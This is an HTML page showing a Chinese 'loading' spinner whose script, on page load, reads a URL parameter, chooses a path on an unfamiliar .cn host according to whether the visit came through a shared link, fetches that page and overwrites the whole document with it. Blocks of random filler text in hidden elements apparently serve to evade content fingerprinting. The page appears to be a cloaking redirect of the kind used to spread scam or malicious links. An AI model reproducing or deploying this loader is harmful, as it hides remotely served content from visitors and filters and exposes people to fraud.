<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .x9FqNJsku {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .x9FqNJsku .TiObzd {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .x9FqNJsku .content {
            line-height: 50px;
            text-align: center
        }

        .x9FqNJsku .img {
            width: 100%
        }

        .x9FqNJsku .nMfyMxWRR {
            text-align: center
        }

        .x9FqNJsku .nMfyMxWRR span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .x9FqNJsku .nMfyMxWRR span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .x9FqNJsku .nMfyMxWRR span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .x9FqNJsku .nMfyMxWRR span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .x9FqNJsku .nMfyMxWRR span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .x9FqNJsku .nMfyMxWRR span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .x9FqNJsku .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function soc8ozbBSxemu(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var SQ7ki2U = soc8ozbBSxemu('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ SQ7ki2U +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ SQ7ki2U +".html?a=share";
		}
		
        zXuGtEwlb=url+"#"+new Date().getTime();
        zXuGtEwlb && function() {
            $.get(zXuGtEwlb, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>BSVz5HObizL8LnDm8Hfbzv3hwrW6ZAFO7A74AEKgJIIPupmiXu7ACH5nYK4XyDTXxIIhoa1WIkGG</a>
<div style='display:none'>fiqN74DudOrA3vsRsuM5Y8O9gQEb22ASlNDm3iTkZ</div>
<li style='display:none' >so9Z2h8R1GVR2pyEeYlnrXoL3vZ4zneEhihY4lbjkTmLRdQE3pD0owHCffggKEkdtBa</li>
<b style='display:none' >INgDgN87wA6qjeeAEUKrnQgjBDE73BmKeHzxMTAhGuMaTsgBLTZTotgp3R4yKKF86P3NE4sxLX0g4IKIQVF4Lo7IR3gkd1e</b>
<ul style='display:none' >Ape6u1A2v6uoWRBwHHpKwJYovoyt6FRaRvQvnvTdU5hz31AiQ53lU8XnbKCO3cHPy3g8K2ElT7qqxJkOv5EPVjoPyYXO22</ul>
<ul style='display:none' >Ape6u1A2v6uoWRBwHHpKwJYovoyt6FRaRvQvnvTdU5hz31AiQ53lU8XnbKCO3cHPy3g8K2ElT7qqxJkOv5EPVjoPyYXO22</ul>
<a  href='#' style='display:none'>BSVz5HObizL8LnDm8Hfbzv3hwrW6ZAFO7A74AEKgJIIPupmiXu7ACH5nYK4XyDTXxIIhoa1WIkGG</a>
<ul style='display:none' >Ape6u1A2v6uoWRBwHHpKwJYovoyt6FRaRvQvnvTdU5hz31AiQ53lU8XnbKCO3cHPy3g8K2ElT7qqxJkOv5EPVjoPyYXO22</ul><div class="x9FqNJsku">
    <div class="TiObzd">
        <div class="nMfyMxWRR">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >ZcqhBueqvALJniasGx4I5soVll2WsY1RHlhwqVyOkKb5P8UfeUdwqciFKrseFpnNy94Rk3nPsKNNOZmhKrNPiPDNI8OlCzLp4e7Z</ul>
<h1 style='display:none' >twKGYL9Udc7OlNRbih7lbQU8UZonRh</h1>
<h1 style='display:none' >twKGYL9Udc7OlNRbih7lbQU8UZonRh</h1>
<ul style='display:none' >ZcqhBueqvALJniasGx4I5soVll2WsY1RHlhwqVyOkKb5P8UfeUdwqciFKrseFpnNy94Rk3nPsKNNOZmhKrNPiPDNI8OlCzLp4e7Z</ul></body>
</html>